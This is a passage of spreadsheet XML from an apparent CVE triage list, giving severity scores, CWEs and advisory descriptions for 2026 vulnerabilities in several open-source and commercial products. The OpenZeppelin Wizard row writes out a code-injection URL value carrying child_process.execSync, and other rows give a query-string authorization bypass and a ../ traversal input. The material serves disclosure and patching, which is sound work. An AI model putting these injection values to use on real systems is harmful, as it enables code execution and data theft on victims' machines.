      <c r="F779" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G779" s="5" t="inlineStr"/>
      <c r="H779" s="5" t="inlineStr"/>
      <c r="I779" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J779" s="5" t="inlineStr"/>
      <c r="K779" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-306, CWE-400</t>
        </is>
      </c>
      <c r="L779" s="5" t="inlineStr">
        <is>
          <t>Arc is an open, SQL-native time-series database for telemetry. Versions prior to 26.06.1 register Go's `net/http/pprof` handlers at `/debug/pprof/*` via `app.Use(pprof.New())` in `internal/api/server.go`, and `/debug/pprof` is added to `PublicPrefixes` in `cmd/arc/main.go`. The auth middleware short-circuits before the token check on prefix match, so the endpoints are reachable without any authentication. Version 26.06.1 contains a patch. Some workarounds are available. Block `/debug/pprof*` at a reverse proxy / load balancer in front of Arc, restrict Arc's API port to known-trusted networks via firewall rules, and/or patch the running build: comment out `app.Use(pprof.New())` in `internal/api/server.go` and rebuild.</t>
        </is>
      </c>
      <c r="M779" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48050</t>
        </is>
      </c>
    </row>
    <row r="780">
      <c r="A780" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B780" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48054</t>
        </is>
      </c>
      <c r="C780" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D780" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E780" s="5" t="inlineStr"/>
      <c r="F780" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G780" s="5" t="inlineStr">
        <is>
          <t>java, node.js</t>
        </is>
      </c>
      <c r="H780" s="5" t="inlineStr"/>
      <c r="I780" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J780" s="5" t="inlineStr"/>
      <c r="K780" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L780" s="5" t="inlineStr">
        <is>
          <t>OpenZeppelin Contracts Wizardis a web application to interactively build a contract out of components from OpenZeppelin Contracts. Versions prior to 0.10.9 generate a Hardhat test file (`test/test.ts`) by interpolating user-supplied `opts.name` (ERC20/ERC721) and `opts.uri` (ERC1155) directly into TypeScript string literals at `zip-hardhat.ts:48` and `:50` without any JavaScript string escaping. No authentication is required: an attacker crafts a URL such as `https[:]//wizard[.]openzeppelin[.]com/#/erc20?name=");require("child_process").execSync("...");("` and shares it with a developer. When the victim downloads the resulting zip archive and runs `npx hardhat test`, the injected Node.js code executes with the developer's local OS privileges. Version 0.10.9 fixes the issue.</t>
        </is>
      </c>
      <c r="M780" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48054</t>
        </is>
      </c>
    </row>
    <row r="781">
      <c r="A781" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B781" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49050</t>
        </is>
      </c>
      <c r="C781" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D781" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E781" s="5" t="inlineStr"/>
      <c r="F781" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G781" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H781" s="5" t="inlineStr">
        <is>
          <t>apache:dolphinscheduler</t>
        </is>
      </c>
      <c r="I781" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J781" s="5" t="inlineStr"/>
      <c r="K781" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L781" s="5" t="inlineStr">
        <is>
          <t>General user can mint admin access tokens via /access-tokens
This issue affects Apache DolphinScheduler: before 3.4.2.
Users are recommended to upgrade to version 3.4.2, which fixes the issue.</t>
        </is>
      </c>
      <c r="M781" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49050</t>
        </is>
      </c>
    </row>
    <row r="782">
      <c r="A782" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B782" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49221</t>
        </is>
      </c>
      <c r="C782" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D782" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E782" s="5" t="inlineStr"/>
      <c r="F782" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G782" s="5" t="inlineStr"/>
      <c r="H782" s="5" t="inlineStr"/>
      <c r="I782" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J782" s="5" t="inlineStr"/>
      <c r="K782" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L782" s="5" t="inlineStr">
        <is>
          <t>Vvveb is a powerful and easy to use CMS with page builder to build websites, blogs or ecommerce stores. Prior to 1.0.8.4, Vvveb backend digital asset operations allow a low-privileged Vendor to access digital assets linked to another Vendor's products. The admin/controller/product/digital-asset.php and admin/controller/product/digital-assets.php controllers and the admin/sql/sqlite/digital_asset.sql data queries use a caller-controlled digital_asset_id without consistently enforcing the current admin_id ownership boundary. An attacker can list assets, read asset names and file metadata, edit asset metadata, or delete asset records, which can disclose private product metadata, corrupt resource links, and cause data loss. This issue is fixed in version 1.0.8.4.</t>
        </is>
      </c>
      <c r="M782" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49221</t>
        </is>
      </c>
    </row>
    <row r="783">
      <c r="A783" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B783" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49228</t>
        </is>
      </c>
      <c r="C783" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D783" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E783" s="5" t="inlineStr"/>
      <c r="F783" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G783" s="5" t="inlineStr"/>
      <c r="H783" s="5" t="inlineStr"/>
      <c r="I783" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J783" s="5" t="inlineStr"/>
      <c r="K783" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L783" s="5" t="inlineStr">
        <is>
          <t>Vvveb is a powerful and easy to use CMS with page builder to build websites, blogs or ecommerce stores. Prior to 1.0.8.4, Vvveb backend product operations allow a low-privileged Vendor to access products owned by another Vendor. The admin/controller/product/products.php controller accepts a caller-controlled product_id for duplicate and delete actions, and admin/sql/sqlite/product.sql loads and mutates products without consistently applying the current admin_id when view_other_products or edit_other_products is absent. An attacker can read product details, duplicate products, or delete products and related catalog data, exposing commercial information and causing unauthorized copies, catalog pollution, data loss, or business disruption. This issue is fixed in version 1.0.8.4.</t>
        </is>
      </c>
      <c r="M783" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49228</t>
        </is>
      </c>
    </row>
    <row r="784">
      <c r="A784" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B784" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49255</t>
        </is>
      </c>
      <c r="C784" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D784" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E784" s="5" t="inlineStr"/>
      <c r="F784" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G784" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H784" s="5" t="inlineStr"/>
      <c r="I784" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J784" s="5" t="inlineStr"/>
      <c r="K784" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L784" s="5" t="inlineStr">
        <is>
          <t>electerm is an open-sourced terminal/ssh/sftp/telnet/serialport/RDP/VNC/Spice/ftp client. Prior to 3.11.11, electerm constructs operating system commands in src/app/lib/fs.js by interpolating untrusted file paths into the rmrf(), mv(), and cp() functions. A malicious SSH or SFTP server can provide a filename containing quote characters and shell metacharacters, and a victim can cause that filename to reach the affected operation during remote-to-local transfer, conflict renaming, copying, moving, or removal. The generated `rm -rf`, mv, `cp -r`, PowerShell Remove-Item, Move-Item, or Copy-Item command can then interpret the filename as shell syntax. This allows arbitrary command execution with the electerm desktop user's privileges on POSIX and Windows systems, enabling data exfiltration, file modification, malware installation, or denial of service. This issue is fixed in version 3.11.11.</t>
        </is>
      </c>
      <c r="M784" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49255</t>
        </is>
      </c>
    </row>
    <row r="785">
      <c r="A785" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B785" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49467</t>
        </is>
      </c>
      <c r="C785" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D785" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E785" s="5" t="inlineStr"/>
      <c r="F785" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G785" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H785" s="5" t="inlineStr"/>
      <c r="I785" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J785" s="5" t="inlineStr"/>
      <c r="K785" s="5" t="inlineStr">
        <is>
          <t>CWE-303, CWE-304</t>
        </is>
      </c>
      <c r="L785" s="5" t="inlineStr">
        <is>
          <t>Pingvin Share X is a secure and easy self-hosted file sharing platform. A vulnerability in versions 1.5.0 through 1.18.0 allow an attacker to bypass password verification when managing Time-based One-Time Password (TOTP) settings. The root cause is a missing `await` keyword on calls to the asynchronous `verifyPassword` method in `authTotp.service.ts` and the `authenticateUser` method in `auth.service.ts`. In JavaScript, an unawaited `Promise` is always truthy. So the logic intended to throw a `ForbiddenException` when a password is incorrect. It never executes because the expression evaluates the existence of the `Promise` object rather than its resolved boolean result. The vulnerability is fixed in version 1.18.1 by ensuring all asynchronous authentication calls are properly awaited. There are no official workarounds. If a user is locked out, an administrator must manually reset the user's TOTP status in the database.</t>
        </is>
      </c>
      <c r="M785" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49467</t>
        </is>
      </c>
    </row>
    <row r="786">
      <c r="A786" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B786" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49473</t>
        </is>
      </c>
      <c r="C786" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D786" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E786" s="5" t="inlineStr"/>
      <c r="F786" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G786" s="5" t="inlineStr"/>
      <c r="H786" s="5" t="inlineStr"/>
      <c r="I786" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J786" s="5" t="inlineStr"/>
      <c r="K786" s="5" t="inlineStr">
        <is>
          <t>CWE-436, CWE-863</t>
        </is>
      </c>
      <c r="L786" s="5" t="inlineStr">
        <is>
          <t>@cedar-policy/authorization-for-expressjs is an open-source Express.js middleware that integrates Cedar authorization into Express applications by mapping HTTP requests to Cedar actions and evaluating authorization policies before allowing requests to proceed. Versions prior to 0.3.0 have an issue where, under certain circumstances, the middleware matches incoming requests against Cedar action mappings using req.originalUrl, which includes the query string, while Express routes requests using only the path component. The middleware uses req.originalUrl to match incoming requests against Cedar action mappings. In Express, req.originalUrl includes the query string, while route matching uses only the path. This creates a divergence between what Cedar authorizes and what Express executes. When an application defines separate actions for overlapping path prefixes with different authorization requirements (for example, GET /users for listing all users with admin-only access, and GET /users/{id} for retrieving a single user with any authenticated user access), an actor can append a query string to bypass the more restrictive policy. Sending GET /users/?x=1 causes the middleware to match against /users/{id} (with id parameter set to ?x=1) and evaluate the less restrictive action, while Express routes the request to the /users list handler. This allows inappropriate access to the more restrictive endpoint. This issue has been addressed in version 0.30. Some workarounds are available. Validate and sanitize incoming request paths before they reach the authorization middleware. Ensure that applications do not rely solely on the middleware for authorization when defining multiple actions on overlapping path prefixes with different permission levels.</t>
        </is>
      </c>
      <c r="M786" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49473</t>
        </is>
      </c>
    </row>
    <row r="787">
      <c r="A787" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B787" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49879</t>
        </is>
      </c>
      <c r="C787" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D787" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E787" s="5" t="inlineStr"/>
      <c r="F787" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G787" s="5" t="inlineStr"/>
      <c r="H787" s="5" t="inlineStr"/>
      <c r="I787" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J787" s="5" t="inlineStr"/>
      <c r="K787" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L787" s="5" t="inlineStr">
        <is>
          <t>In multiple functions of rw_t3t.cc, there is a possible out of bounds write due to an integer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M787" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49879</t>
        </is>
      </c>
    </row>
    <row r="788">
      <c r="A788" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B788" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49882</t>
        </is>
      </c>
      <c r="C788" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D788" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E788" s="5" t="inlineStr"/>
      <c r="F788" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G788" s="5" t="inlineStr"/>
      <c r="H788" s="5" t="inlineStr"/>
      <c r="I788" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J788" s="5" t="inlineStr"/>
      <c r="K788" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L788" s="5" t="inlineStr">
        <is>
          <t>In rw_mfc_handle_read_op of rw_mfc.cc, there is a possible memory safety issue due to a heap buffer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M788" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49882</t>
        </is>
      </c>
    </row>
    <row r="789">
      <c r="A789" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B789" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50186</t>
        </is>
      </c>
      <c r="C789" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D789" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E789" s="5" t="inlineStr"/>
      <c r="F789" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G789" s="5" t="inlineStr"/>
      <c r="H789" s="5" t="inlineStr"/>
      <c r="I789" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J789" s="5" t="inlineStr"/>
      <c r="K789" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L789" s="5" t="inlineStr">
        <is>
          <t>4gaBoards is a boards system for realtime project management. Prior to 3.3.8, 4gaBoards allows an authenticated project manager to supply traversal sequences in the filename parameter of GET /exports/:id/:filename. In server/api/controllers/boards/download.js, the decoded inputs.filename value is passed to path.join() beneath private/exports/&lt;user_id&gt;/ without containment validation. A crafted value such as ../ can select an arbitrary file readable by the server process, and the file is returned to the attacker. The fileStream close handler then passes the same path to fs.unlink(), deleting the selected file and potentially causing data loss or denial of service. This issue is fixed in version 3.3.8.</t>
        </is>
      </c>
      <c r="M789" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50186</t>
        </is>
      </c>
    </row>
    <row r="790">
      <c r="A790" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B790" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50191</t>
        </is>
      </c>
      <c r="C790" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D790" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E790" s="5" t="inlineStr"/>
      <c r="F790" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G790" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H790" s="5" t="inlineStr"/>
      <c r="I790" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J790" s="5" t="inlineStr"/>
      <c r="K790" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-288</t>
        </is>
      </c>
      <c r="L790" s="5" t="inlineStr">
        <is>
          <t>4gaBoards is a boards system for realtime project management. Prior to 3.3.8, 4gaBoards is vulnerable to pre-account takeover when registrationEnabled, localRegistrationEnabled, and ssoRegistrationEnabled are enabled and Google, GitHub, Microsoft, or OIDC SSO is configured. The POST /api/register endpoint permits creation of an unverified local account with a victim's email address, and POST /api/access-tokens permits that account to authenticate while isVerified is false. During the victim's first SSO login, server/api/helpers/users/get-create-one-for-github-sso.js, server/api/helpers/users/get-create-one-for-google-sso.js, server/api/helpers/users/get-create-one-for-microsoft-sso.js, and server/api/helpers/users/get-create-one-for-oidc-sso.js find the attacker-controlled account by email and link the verified SSO identity without confirming ownership of the local account. The attacker can retain local-password access to the linked account and obtain the victim's projects, data, and permissions. This issue is fixed in version 3.3.8.</t>
        </is>
      </c>
      <c r="M790" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50191</t>
        </is>
      </c>
    </row>
    <row r="791">
      <c r="A791" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B791" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50768</t>
        </is>
      </c>
      <c r="C791" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D791" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E791" s="5" t="inlineStr"/>
      <c r="F791" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G791" s="5" t="inlineStr"/>
      <c r="H791" s="5" t="inlineStr"/>
      <c r="I791" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J791" s="5" t="inlineStr"/>
      <c r="K791" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="L791" s="5" t="inlineStr">
        <is>
          <t>File Upload vulnerability in T-Systems International GmbH ImageMaster Version: 9.14.2.8.1 allows a remote attacker to execute arbitrary code via the add attachments feature in the create new document function.</t>
        </is>
      </c>
      <c r="M791" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50768</t>
        </is>
      </c>
    </row>
    <row r="792">
      <c r="A792" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B792" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51974</t>
        </is>
      </c>
      <c r="C792" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D792" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E792" s="5" t="inlineStr"/>
      <c r="F792" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G792" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H792" s="5" t="inlineStr"/>
      <c r="I792" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J792" s="5" t="inlineStr"/>
      <c r="K792" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L792" s="5" t="inlineStr">
        <is>
          <t>An eval() injection vulnerability in the get_list function in modules/meta_parser.py in lllyasviel Fooocus 2.1.854 through 2.5.5 allows remote attackers to execute arbitrary Python code via a crafted styles payload in the EXIF metadata of an uploaded image file.</t>
        </is>
      </c>
      <c r="M792" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51974</t>
        </is>
      </c>
    </row>
    <row r="793">
      <c r="A793" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B793" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52691</t>
        </is>
      </c>
      <c r="C793" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D793" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E793" s="5" t="inlineStr"/>
      <c r="F793" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G793" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H793" s="5" t="inlineStr"/>
      <c r="I793" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J793" s="5" t="inlineStr"/>
      <c r="K793" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L793" s="5" t="inlineStr">
        <is>
          <t>** UNSUPPORTED WHEN ASSIGNED ** Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Apache Griffin Hive Metastore Module. 
This issue affects Apache Griffin Hive Metastore Module: all versions.
As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users.
NOTE: This vulnerability only affects products that are no longer supported by the maintainer.</t>
        </is>
      </c>
      <c r="M793" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52691</t>
        </is>
      </c>
    </row>
    <row r="794">
      <c r="A794" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B794" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52775</t>
        </is>
      </c>
      <c r="C794" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D794" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E794" s="5" t="inlineStr"/>
      <c r="F794" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G794" s="5" t="inlineStr"/>
      <c r="H794" s="5" t="inlineStr"/>
      <c r="I794" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J794" s="5" t="inlineStr"/>
      <c r="K794" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L794" s="5" t="inlineStr">
        <is>
          <t>YesWiki is a wiki system written in PHP. Prior to version 4.6.6, YesWiki through the latest development branch contains a SQL injection vulnerability in ReactionManager::deleteUserReaction() that allows any authenticated user to inject arbitrary SQL via the {idreaction} and {id} URL path parameters. The parameters are concatenated directly into a SQL LIKE clause without escaping or parameterization. This issue has been patched in version 4.6.6.</t>
        </is>
      </c>
      <c r="M794" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52775</t>
        </is>
      </c>
    </row>
    <row r="795">
      <c r="A795" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B795" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52872</t>
        </is>
      </c>
      <c r="C795" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D795" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E795" s="5" t="inlineStr"/>
      <c r="F795" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G795" s="5" t="inlineStr"/>
      <c r="H795" s="5" t="inlineStr"/>
      <c r="I795" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J795" s="5" t="inlineStr"/>
      <c r="K795" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-73</t>
        </is>
      </c>
      <c r="L795" s="5" t="inlineStr">
        <is>
          <t>Streambert is a cross-platform Electron Desktop App to stream and download video content. Prior to 2.5.0, the downloadSubtitleFile utility in src/ipc/downloads.js, reached through the run-download IPC channel, accepts a renderer-supplied subtitle url using the file: URI scheme and passes its decoded pathname to fs.copyFileSync. The renderer also controls downloadPath, which determines the destination path. A compromised renderer can therefore copy any file readable by the StreamBERT process into an attacker-chosen writable location, exposing sensitive local data, and can overwrite existing writable files. This vulnerability is fixed in 2.5.0.</t>
        </is>
      </c>
      <c r="M795" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52872</t>
        </is>
      </c>
    </row>
    <row r="796">
      <c r="A796" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B796" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52876</t>
        </is>
      </c>
      <c r="C796" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D796" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E796" s="5" t="inlineStr"/>
      <c r="F796" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G796" s="5" t="inlineStr"/>
      <c r="H796" s="5" t="inlineStr"/>
      <c r="I796" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J796" s="5" t="inlineStr"/>
      <c r="K796" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-78</t>
        </is>
      </c>
      <c r="L796" s="5" t="inlineStr">
        <is>
          <t>Streambert is a cross-platform Electron Desktop App to stream and download video content. Prior to version 2.6.0, the open-path-at-time IPC handler in src/ipc/player.js accepts a renderer-controlled filePath without validating its type or location. If the mpv or VLC launch attempts are skipped or fail, the handler passes filePath to Electron's shell.openPath. A compromised renderer can provide the path of a local executable, script, shortcut, or other file with an executing default handler, causing the operating system to launch it with the privileges of the StreamBERT process and enabling escape from the renderer sandbox. This issue is fixed in version 2.6.0.</t>
        </is>
      </c>
      <c r="M796" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52876</t>
        </is>
      </c>
    </row>
    <row r="797">
      <c r="A797" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B797" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53071</t>
        </is>
      </c>
      <c r="C797" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D797" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E797" s="5" t="inlineStr"/>
      <c r="F797" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G797" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H797" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I797" s="5" t="inlineStr">
        <is>
          <t>2026-06-24</t>
        </is>
      </c>
      <c r="J797" s="5" t="inlineStr"/>
      <c r="K797" s="5" t="inlineStr">
        <is>
          <t>CWE-416, CWE-667</t>
        </is>
      </c>
      <c r="L797" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: l2cap: Add missing chan lock in l2cap_ecred_reconf_rsp
l2cap_ecred_reconf_rsp() calls l2cap_chan_del() without holding
l2cap_chan_lock(). Every other l2cap_chan_del() caller in the file
acquires the lock first. A remote BLE device can send a crafted
L2CAP ECRED reconfiguration response to corrupt the channel list
while another thread is iterating it.
Add l2cap_chan_hold() and l2cap_chan_lock() before l2cap_chan_del(),
and l2cap_chan_unlock() and l2cap_chan_put() after, matching the
pattern used in l2cap_ecred_conn_rsp() and l2cap_conn_del().</t>
        </is>
      </c>
      <c r="M797" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53071</t>
        </is>
      </c>
    </row>
    <row r="798">
      <c r="A798" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B798" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53277</t>
        </is>
      </c>
      <c r="C798" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D798" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E798" s="5" t="inlineStr"/>
      <c r="F798" s="5" t="n">
        <v>0.001</v>
      </c>
